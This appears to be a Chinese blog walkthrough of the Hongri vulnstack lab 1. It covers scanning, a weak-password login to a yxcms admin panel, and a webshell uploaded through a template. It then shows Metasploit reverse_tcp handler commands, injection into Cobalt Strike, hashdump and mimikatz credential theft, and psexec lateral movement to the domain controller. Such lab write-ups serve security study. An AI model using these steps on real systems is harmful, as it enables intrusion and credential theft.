红日一(内网渗透)

已于 2023-03-29 11:16:02 修改
阅读量151 收藏
点赞数
文章标签: 网络 服务器 tcp/ip
于 2023-03-29 11:04:38 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_46487664/article/details/129830715
版权

目录

拓扑图

一、环境配置

二、web渗透

三、后渗透

内网信息收集

系统信息收集

域信息收集

拓扑图

一、环境配置

角色

IP地址

攻击机

192.168.8.74

win7(外网)

192.168.8.115

win7(内网)

192.168.52.143

server03

192.168.52.141

server08

192.168.52.138

二、web渗透

信息收集

主机发现

sudo netdiscover -i eth0 -r 192.168.8.0/24

端口扫描

sudo nmap -A 192.168.8.115

一级目录爆破

​压缩文件利用

下载压缩文件

查看下载文件内容,发现网站是通过yxcms搭建的

查看升级日志,确定版本号为1.2.1

推测二级目录下可能存在yxcms网站

​发现后台账密

通过弱口令登入网站后台,admin;123456

​成功拿下后台

​来到后台管理模板,上传一句话木马

​审计yxcms源代码,确定一句话木马位置

​查看一句话木马是否成功执行

​使用蚁剑进行连接

​拿到webshell

三、后渗透

使用msf生成木马进行回连

​开启监听

use exploit/mutli/handler set payload windows/meterpreter/reverse_tcp

set lhost 192.168.8.74

set lport 4444

​将木马程序通过webshell上传

执行木马

​反弹shell

内网信息收集

查看当前机器的身份

whoami

显示主机名称

hostname

显示本地管理员组

net localgroup administrators

系统信息收集

查看系统版本

systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

查看系统架构

echo %PROCESSOR_ARCHITECTURE%

​查询已安装的软件及版本信息

wmic product get name,version

​查看进程及服务

tasklist /svc

域信息收集

判断是否存在域(查看主DNS)

ipconfig /all

​查看域信息

net view

​查看主域信息

net view /domain

 

查找域控

查看域控时间

net time /domain

解析DNS域服务器

nslooup god.org

ping也可以解析域名

ping god.org

 

cs配置

启动cs服务端

sudo ./teamserver 192.168.8.74 123456

​启动客户端进行连接

./cs.sh

​新建一个监听器,和msf监听ip和端口保持一致

​msf联动cs

将服务器反弹shell进行挂起

background

​msf将shell弹到cs上

use exploit/windonws/local/payload_inject #使用进程注入模块

set payload windows/meterpreter/reverse_http #windows反向http连接

set DisablePayloadHandler true #禁止产生一个新的handler set lport 4444 #监听的端口

set lhost 192.168.8.74 #配置本地ip set session 31 #迁移的会话 run

​cs上线

​cs横向探测

主机扫描net view

​视图查看存活主机

​使用hashdump抓取内存密码,mimikatz抓取注册表明文密码或ntml-hash

hashdump

​logonpasswords

​点击视图,查看凭证信息,查看相关用户的密码和ntlm-hash

​内网横移

使用smb隧道

​使用psexec通过凭证登录到其他主机

选择一个属于域的凭证信息,监听器选择smb,会话选择获取的stu1

​以上面姿势重复一遍,可以获取域控的beacon

确认域控已被拿下

查看用户权限

shell whoami

网安小Q
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
内网渗透——红日靶机学习(一)
jammny
11-13 6189
前言 开启内网学习,域渗透之路... 环境搭建 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 内网拓扑: 我选用wmware ESXI进行内网环境搭建,内网搭建如下: WIN7(web服务器):172.26.16.123/192.168.52.143 WIN2008(域控):192.168.52.138 WIN2003(域成员):192.168.52.141 渗透测试 一、外网打点 信息收..
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
05-11
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记_红日靶场1攻略-CSDN博客.html
红日(vulnstack)1 内网渗透ATT&CK实战
m0_66299232的博客
02-27 700
8.link 192.168.52.138 成功上线cs,执行shell whoami 管理员权限,成功拿下!win7 192.168.111.128 192.168.52.143 自定义网卡4,自定义网卡3。kali 192.168.1.108 192.168.111.129 桥接一块,自定义网卡4。开启之后数据库所有运行的日志会记录在general_log_file中。4.net use 发现建立成功后,上传木马程序。1.开启cs,生成木马,上传到蚁剑,执行。6.成功执行,whomi发现是系统权限。红日
[WEB安全]红日靶场(一)环境搭建
网络安全知识分享
11-20 1万+
[红日靶场一]环境搭建前言环境搭建官方给的路线 前言 VulnStack 官方链接 环境搭建 下载好之后解压完成 打开3个解压文件夹的vmx文件,会自动打开Vmware,初始的密码都是:hongrisec@2019,我登陆时有的机器会提示我密码过期,更改密码即可。 网络拓扑图如下: 从拓扑图我们得知,win7是一个边界服务器,所以是需要有两个网卡的,首先给win7添加一个网卡 将win7的网络适配器1设置成自定义Vmnet1(仅主机模式),网络适配器2设置成NAT模式 Win2003、Win2008 网
内网域渗透—红日靶场1
一个普普通通的博客
04-19 1144
红日靶场1
红日一靶场搭建
weixin_60362505的博客
11-15 2198
红日1靶场环境搭建
渗透思路奇思妙想 -simeon.pdf
02-25
2020年红日安全星火沙龙PPT渗透思路奇思妙想 -simeon.pdf
红日串词.doc
09-16
红日串词.doc
红日安全-wp1
08-03
护网杯 Write up--红日安全迟来的签到base64 解密,得到如下结果:根据题目提示为 xor 异或,利用 c 语言撰写脚本利用 burp 爆破获得大辣
2020年红日安全星火沙龙PPT.zip
02-25
2020年红日安全星火沙龙PPT
红日靶场1
yc11223344的博客
05-18 324
开放了80,3306端口。
ATT&CK 实战 - 红日安全 vulnstack (一)
洛柒尘的博客
08-20 4479
前言 1 | 环境搭建 | 1.0 | 靶场介绍 | ATT&CK实战系列—红队实战(一)是红日安全团队出品的一个实战环境,该靶场模拟真实环境。 1.0.0 | 靶场信息 | 靶场名: vulnstack 1 下载链接: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 靶机数量: 3 1.0.1 | 虚拟机配置 | 所有主机密码为:hongrisec@2019 密码同一修改为:hongrisec@2021 攻击机 名称
内网渗透实战——红日ATT&CK系列靶场(一)学习笔记
ierciyuan的博客
08-01 1万+
内网渗透实战攻打红日靶场第一关,包括环境配置、信息收集、漏洞利用、内网信息收集、内网攻击、横向移动等操作。
Vulnstack红日安全内网域渗透靶场1实战
热门推荐
道阻且长,行则将至。
07-14 1万+
文章目录前言靶场搭建外网打点MySQL写日志GetshellCMS后台上传GetShell内网渗透靶机CS后门上线内网域信息的收集 前言 VulnStack 是由红日安全团队倾力打造一个靶场知识平台。为了进一步学习内网渗透,本文将学习并记录红日安全团队提供的一个内网域环境靶场的渗透过程。 靶场搭建 在线 靶场链接 如下: 1、下载后为 3 个虚拟机,网络拓扑如下: 2、从网络拓扑图得知,需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,故需要配置两个网络适配器(网卡),点击
红日内网渗透靶场1(ATK&CK红队评估实战靶场一)
qq_45780190的博客
02-21 1万+
环境搭建: 官方下载地址以及实验文档如下: http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ 网络拓扑 需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网。添加网络设配器如下图。 将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)。 而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式
红日靶场第一关
红队是青春
11-16 6939
红日靶场第一关 一、环境配置 NET网卡(kali、windows) kali:172.16.12.187 windows:172.16.12.1 靶机win7:172.16.12.127 VMnet2网卡(内网靶机Win2K3、内网靶机Win2008 R2) 内网靶机Win2K3:192.168.52.141 内网靶机Win2008 R2:192.168.52.138 内网靶机win7:192.168.52.163 二、目标 一、环境搭建 1.环境搭建测试 2.信息收集 二、漏洞利用 3.漏洞搜集与利用
不出网上线CS的各种姿势(内网横向)
最新发布
qq_64395221的博客
06-21 923
内网环境中可以使用ipc $生成的SMB Beacon上传到目标主机执行,但是目标主机并不会直接上线的,需要我们自己用链接命令(link <ip>)去连接它。经常是拿下一台边缘机器,其有多块网卡,用于连接内外网,内网机器都不出网。因为连接的Beacons使用Windows命名管道进行通信,此流量封装在SMB协议中,所以SMB Beacon相对隐蔽,绕防火墙时可能发挥奇效。一样,建立pystinger连接之后,直接生成payload在业务主机执行,业务内网主机192.168.111.236即可成功上线。
Java——包
Stewie Lee的博客
06-21 838
包是Java命名空间机制的一部分,用于将相关的类、接口和子包进行分组,以避免命名冲突和提高代码的可维护性,以及控制类、接口等的访问范围。在一个Java源文件的开头使用package关键字来声明它所属的包。
Spring Boot如何集成WebSocket
fengjing81的专栏
06-21 439
在Spring Boot中集成WebSocket,你通常可以使用Spring框架提供的WebSocket支持,包括STOMP(Simple Text Orientated Messaging Protocol)和SockJS(用于浏览器和WebSocket服务器之间的通信的库,提供了多种传输方式)。在你的pom.xml(Maven)或build.gradle(Gradle)中添加Spring Boot的WebSocket和STOMP支持的相关依赖。配置WebSocket。// 显示接收到的消息。
红日靶场ping不通内网
08-17
关于红日靶场无法ping通内网的问题,我需要更多的详细信息才能给出准确的解答。以下是一些可能的原因和解决方法: 1. 防火墙设置:确保您的内网防火墙未阻止来自红日靶场IP的ping请求。请检查防火墙规则并确保允许...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值